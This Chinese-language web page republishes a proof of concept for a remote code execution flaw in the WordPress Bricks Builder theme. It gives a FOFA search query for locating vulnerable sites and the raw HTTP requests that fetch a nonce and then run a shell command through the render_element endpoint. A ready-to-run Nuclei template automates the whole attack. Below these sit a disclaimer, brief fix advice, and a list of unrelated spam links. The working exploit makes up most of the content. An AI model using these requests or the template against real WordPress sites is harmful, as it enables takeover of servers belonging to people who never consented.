当前位置: 首页 > news >正文

中国十大搜索引擎网站做网站的接私活犯法吗

中国十大搜索引擎网站,做网站的接私活犯法吗,网站开发 报刊,小程序推广app免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该…

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

Bricks Builder是一款用于WordPress的开发主题,提供直观的拖放界面,用于设计和构建WordPress网站。它使用户能够轻松创建自定义的网页布局和设计,无需编写或了解复杂的代码。Bricks Builder具有用户友好的界面和强大的功能,使用户可以通过简单的拖放操作添加、编辑和排列各种网页元素,例如文本框、图像、按钮、导航菜单等。它为WordPress用户提供了一种直观且便捷的方式来构建专业和吸引人的网站,无论是个人博客、商业网站还是电子商务平台。

由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用,導致遠程代碼執行漏洞,惡意攻擊者可能會利用此漏洞執行惡意代碼,從而獲取服務器權限。

影響版本

Brick Builder 主题在低于<= 1.9.6

Ⅱ、fofa语句

body="/wp-content/themes/bricks/"

Ⅲ、漏洞复现

POC-1

GET / HTTP/1.1
Host: 127.0.0.1

POC-2

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Content-Type: application/json{"postId": "1","nonce": "dc50d26123","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}
}

1、构建 POC,获取nonce值

2、使用第一步获取的nonce值构造数据包,执行RCE

Ⅳ、Nuclei-POC

id: WordPres-Bricks-Builder-RCEinfo:name: 由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用,導致遠程代碼執行漏洞,惡意攻擊者可能會利用此漏洞執行惡意代碼,從而獲取服務器權限。author: WLFseverity: highmetadata: fofa-query: body="/wp-content/themes/bricks/"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |GET / HTTP/1.1Host: {{Hostname}}- |POST /wp-json/bricks/v1/render_element HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: */*Content-Type: application/json{"postId": "1","nonce": "{{path}}","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}}extractors:- type: regexname: pathgroup: 1regex:- '"nonce":"(\w*)"'internal: truematchers:- type: dsldsl:- status_code==200 && contains_all(body,"Exception","gid=","uid=")

Ⅴ、修复建议

1、关闭互联网暴露面或接口设置访问权限

2、部署WAF对站点路径进行防护

3、将Bricks Builder组件升级只安全版本

http://www.15wanjia.com/news/168258.html

相关文章:

  • 哪些网站可以做详情页网络运营推广是做什么的
  • 推荐小蚁人网站建设网站建设的流程怎么写
  • 手机模板网站东莞网站建设优化诊断
  • 视频拍摄流程seo快速排名外包
  • 黄冈市建设信息网站模板网站建设清单
  • vs网站开发 怎么运行网站制作公司业务发展方案
  • 河南做网站优化企业管理咨询合同
  • 旅游网站设计完整代码宁波网络推广平台推荐公司
  • 龙华网站建设招商洛阳外贸网站推广
  • 配件查询网站制作山东大连
  • 企业首次建设网站方案流程企业网络推广的方法
  • 网站响应方案校园o2o平台有哪些
  • 做网站的服务器cpu异常wordpress清除原图
  • 淘宝优惠券网站建设教程国内对企业网站开发的研究
  • 网站建设 域名免费私人网站
  • 做电池的有哪些网站微信公众号搭建网站
  • 世赛网站开发与设计网站制作公司信科网络
  • 湖北建设局网站首页柳州住房和城乡建设局网站
  • 如何建立网站站点二级域名需要申请吗
  • 手机网站开发建设方案游戏游戏大全
  • 网站建设客户问题263企业邮箱手机版
  • 泰安网站开发制作公司中国销售网
  • 如何与对方网站做相互链接内蒙古工程建设招投标中心网站
  • 网站建设内部下单流程网络营销就是seo
  • 天天新网站35互联做网站好吗
  • 福州商城网站建设数商云科技
  • 高端网站建设公司兴田德润在那里如何把网站建设好
  • 阜宁网站制作费用网上怎样正规赚钱
  • 网站域名如何管理建设购物网站要求
  • 莱芜做网站号码WordPress uchome